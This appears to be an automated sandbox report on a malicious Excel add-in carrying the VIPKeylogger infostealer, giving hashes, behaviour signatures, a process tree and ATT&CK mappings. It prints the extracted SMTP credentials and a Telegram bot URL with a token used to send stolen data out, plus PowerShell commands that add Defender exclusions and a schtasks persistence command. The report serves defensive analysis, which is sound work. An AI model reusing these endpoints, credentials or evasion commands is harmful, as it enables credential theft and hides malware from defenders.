Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
23-01-2025 11:53
General
-
Target
RFQ_5729400129.xll
-
Size
3KB
-
MD5
d1a5639d720b895c6f9bea976788777b
-
SHA1
0dec9cc7efa216f1088debf0d42c517d1c31f95e
-
SHA256
65bab37bd3f4aafb41808b286af3e32ab794420c0ed48b880160556e96c0d107
-
SHA512
7da73d97c4335f164ca9ff2555c905b2782243163f13a4a24f494e2446d6a89a1b6780eae0302b6f332fbd48963b3334f414924ce48e87e478592fc7809b0f40
Malware Config
Extracted
Protocol: smtp- Host:
mail.bteenerji.com - Port:
587 - Username:
[email protected] - Password:
123husnu
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.bteenerji.com - Port:
587 - Username:
[email protected] - Password:
123husnu - Email To:
[email protected]
https://api.telegram.org/bot7002166096:AAGYk1iGM39bnBJfB6xWCZnZold1wr86Vf4/sendMessage?chat_id=7486505413
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ_5729400129.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\regasms.exeC:\Users\Admin\AppData\Roaming\regasms.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\regasms.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ghwNVGxqmf.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ghwNVGxqmf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF5AA.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\regasms.exeC:\Users\Admin\AppData\Roaming\regasms.exe3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD56c14b13b09ca3250b8c108b05aa1afb0
SHA118e50e6f1f445add8dbfd7441dba50b4d36f42f0
SHA256a147f4fb3ba4dee9197d7192ce22385e2c5da6987ab044bd2d2d2b7adac71c4a
SHA512feca9dd078055a76d09290c2e6ff9dae608bdff807fe7e742ea4961a4877f2b5eb3d9d171941dfd0f19cebd1cebed7d35b3d6cbbecfe7ddfda5daf2bb4f85f69
-
Filesize
3KB
MD5d1a5639d720b895c6f9bea976788777b
SHA10dec9cc7efa216f1088debf0d42c517d1c31f95e
SHA25665bab37bd3f4aafb41808b286af3e32ab794420c0ed48b880160556e96c0d107
SHA5127da73d97c4335f164ca9ff2555c905b2782243163f13a4a24f494e2446d6a89a1b6780eae0302b6f332fbd48963b3334f414924ce48e87e478592fc7809b0f40
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c278de9e8a585f51ec84e200e0ad6d35
SHA19b88e07dd7129fa0ec23e0b85f04a2c6f91bf539
SHA25644e41197cb1debd4e8b689d17971728bef4efe04e380bdc5b9aaad560e41eefe
SHA512809af4af1c89c97af3d999137203a5c89af59f3d32dbc5701099cb49de045986105b7c1d81a6977a3394dffb246ade9acfbe1b92665adf2e3490317bf655a7d8
-
Filesize
1.0MB
MD5914cf9ee6bda9c8cc07c45843a05892a
SHA177a236bab711cc03f5b26828aef82d3daffbe62a
SHA256a1d41a84971cbc1098a8af397f160b20c2b029bcbd3eb3549fae687c4dd7fdd0
SHA5125fc09ba3e5216c9b0d9819f88baf4029fc9202ab6bc0c72a02af90205af9915d06f103b1363090a08addd1e5652bc4f4ebdcc2f1ee60647346440885de80749f
-
Filesize
136KB
-
Filesize
5.2MB
-
Filesize
320KB
-
Filesize
1.8MB
-
Filesize
288KB
-
Filesize
2.0MB
-
Filesize
80KB
-
Filesize
2.0MB
-
Filesize
560KB
-
Filesize
2.0MB
-
Filesize
152KB
-
Filesize
1.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
20KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB